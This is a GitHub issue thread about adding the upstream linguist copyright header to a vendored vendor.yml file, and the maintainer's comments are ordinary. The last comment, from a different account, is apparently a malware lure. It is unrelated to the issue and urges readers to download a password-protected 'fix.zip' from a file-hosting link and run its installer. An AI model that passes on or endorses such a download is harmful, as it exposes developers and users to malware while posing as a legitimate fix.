### ISSUE TITLE
[bug] Fix copyright header on internal/vendoring/vendor.yml

### ISSUE THREAD

**Issue by ianlewis** [ianlewis/todos#1549]
It should include the copyright `Copyright (c) 2017 GitHub, Inc.` from https://github.com/github-linguist/linguist/blob/master/LICENSE.

It should also probably just be vendored in a `third_party` directory or something like that. Related to #1545

**Comment by ianlewis** [comment]
`vendor.yml` is modified to remove some entries so it could be just left where it is, but include the copyright header since it's derivative.

**Comment by royalkush** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."
